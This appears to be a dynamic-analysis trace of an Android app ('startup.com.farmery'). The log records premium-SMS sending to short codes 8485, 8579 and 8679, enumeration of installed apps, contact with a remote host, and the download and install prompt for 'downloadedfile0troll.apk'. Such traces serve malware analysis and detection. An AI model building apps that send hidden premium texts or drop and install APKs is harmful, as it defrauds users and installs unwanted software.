D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml] [MODE][int] [0660]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [SENT3]
D/S4URC   ( 3500): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [DELIVER3]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][SENT3,
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][DELIVER3,
D/S4URC   ( 3500): [SDK] [android.telephony.SmsManager] [sendTextMessage] [DesADD] [8485] [SourceADD] [null] [TextMessage] [TT STORE VN99]
D/S4URC   ( 3500): [SDK] [android.telephony.SmsManager] [sendTextMessage] [DesADD] [8579] [SourceADD] [null] [TextMessage] [TVD GNAUAN]
D/S4URC   ( 3500): [SDK] [android.telephony.SmsManager] [sendTextMessage] [DesADD] [8679] [SourceADD] [null] [TextMessage] [TVD GNAUAN]
D/S4URC   ( 3500): [SDK] [android.telephony.SmsManager] [sendTextMessage] [DesADD] [8579] [SourceADD] [null] [TextMessage] [TVD GNAUAN]
D/S4URC   ( 3500): [SDK] [android.app.ApplicationPackageManager] [getInstalledApplications]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3500): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/downloadedfile0troll.apk]
D/S4URC   ( 3500): [NDK] [SYSCALL] [stat] [PATH][string] [/storage/sdcard0/downloadedfile0troll.apk]
D/S4URC   ( 3500): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://beatvn.pro/cpi/]
D/S4URC   ( 3500): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://settings/system/enable_stylus_gestures]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][isFirst] [Return][true]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][Day1] [Return][8]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][isSecond] [Return][true]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][Day2] [Return][8]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][isThird] [Return][true]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][Day3] [Return][8]
D/S4URC   ( 3500): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://beatvn.pro/cpi/]
D/S4URC   ( 3500): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/sdcard/downloadedfile0troll.apk]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/sdcard/downloadedfile0troll.apk]
D/S4URC   ( 3500): [NDK] [SYSCALL] [open] [PATH][string] [/sdcard/downloadedfile0troll.apk] [RETURN][int] [98]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3500): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3500): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [android.intent.action.VIEW]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/downloadedfile0troll.apk]
D/S4URC   ( 3500): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/startup.com.farmery/app_webview/Application Cache/Index]
